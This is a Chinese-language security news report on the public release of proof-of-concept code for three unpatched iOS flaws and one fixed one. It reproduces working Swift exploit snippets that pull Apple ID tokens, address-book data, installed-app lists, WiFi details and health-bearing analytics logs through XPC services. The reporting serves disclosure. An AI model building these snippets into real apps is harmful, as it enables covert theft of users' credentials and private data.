研究人員發現三個iOS 0 day漏洞PoC代碼
作者:ang010ela
GitHub用戶illusionofchaos在GitHub上發布了4個iOS 安全漏洞的PoC代碼,其中包含3個0 day漏洞和1個已修復的安全漏洞。
研究人員發現3個iOS 0 day漏洞PoC代碼。
GitHub用戶illusionofchaos在GitHub上發布了4個iOS 安全漏洞的PoC代碼,其中包含3個0 day漏洞和1個已修復的安全漏洞。這4個漏洞分別是:
- Gamed 0-day
- Nehelper Enumerate Installed Apps 0-day
- Nehelper Wifi Info 0-day
- Analyticsd (iOS 14.7中已修復)
Gamed 0-day
從APP store中按住那個的應用可以在用戶不知情的情況下訪問以下信息:
- Apple ID郵箱和Apple ID賬戶的全名;
- Apple ID認證token,允許以用戶名義訪問*.apple.com上的至少1個終端;
- Core Duet數據庫的完全文件系統讀權限,其中包含郵箱、SMS、iMessage和第3方消息APP的聯系人,以及與這些聯系人進行用戶交互的元數據;
- 快速撥號數據庫和地址簿數據庫的完全文件系統讀權限,包括聯系人圖片和其他元數據;
PoC代碼如下:
- let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
- let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
- let pid = ProcessInfo.processInfo.processIdentifier
- proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
- accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
- let appleID = response.credential.accountName
- let token = response.credential.authenticationToken
- }
- utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
- let addressBookData = data
- }
- }
Nehelper Enumerate Installed Apps 0-day
該漏洞允許任何用戶安裝的APP來確定設備上安裝的APP是否是給定的bundle ID。XPC終端com.apple.nehelper 有一個訪問APP的方法可以接受bundle ID作為參數,并返回含有緩存UUID的數組,緩存的UUID可以用來與設備上安裝的應用的bundle ID進行配對。具體參見/usr/libexec/nehelper的[NEHelperCacheManager onQueueHandleMessage:] :
- func isAppInstalled(bundleId: String) -> Bool {
- let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)!
- xpc_connection_set_event_handler(connection, { _ in })
- xpc_connection_resume(connection)
- let xdict = xpc_dictionary_create(nil, nil, 0)
- xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
- xpc_dictionary_set_uint64(xdict, "cache-command", 3)
- xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
- let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
- if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
- return true
- }
- return false
- }
Nehelper Wifi Info 0-day
XPC終端com.apple.nehelper會接收用戶提供的參數sdk-version,如果該值小于后等于524288,com.apple.developer.networking.wifi-info entiltlement就會跳過。這使得任何符合條件的APP都可以在無需entiltlement的情況下獲取WiFi信息。
- func wifi_info() -> String? {
- let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
- xpc_connection_set_event_handler(connection, { _ in })
- xpc_connection_resume(connection)
- let xdict = xpc_dictionary_create(nil, nil, 0)
- xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
- xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
- xpc_dictionary_set_string(xdict, "interface-name", "en0")
- let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
- if let result = xpc_dictionary_get_value(reply, "result-data") {
- let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
- let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
- return "SSID: \(ssid)\nBSSID: \(bssid)"
- } else {
- return nil
- }
- }
Analyticsd (iOS 14.7中已修復)
該漏洞允許任意用戶安裝的APP訪問分析日志。這些日志中含有以下信息:
- 醫療信息,包括心跳、異常心律事件等;
- 設備使用信息,包括推送通知數和用戶的行為等;
- 屏幕時間信息和給定bundle ID的所有有用的會話數;
- Safari中用戶查看的web頁面的語言;
- 設備配件的信息,包括廠商、型號、固件版本和用戶分配的名字;
- func analytics_json() -> String? {
- let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2)
- xpc_connection_set_event_handler(connection, { _ in })
- xpc_connection_resume(connection)
- let xdict = xpc_dictionary_create(nil, nil, 0)
- xpc_dictionary_set_string(xdict, "command", "log-dump");
- let reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
- return xpc_dictionary_get_string(reply, "log-dump");
- }
更多參見:https://habr.com/ru/post/579714/
責任編輯:趙寧寧
來源:
嘶吼網
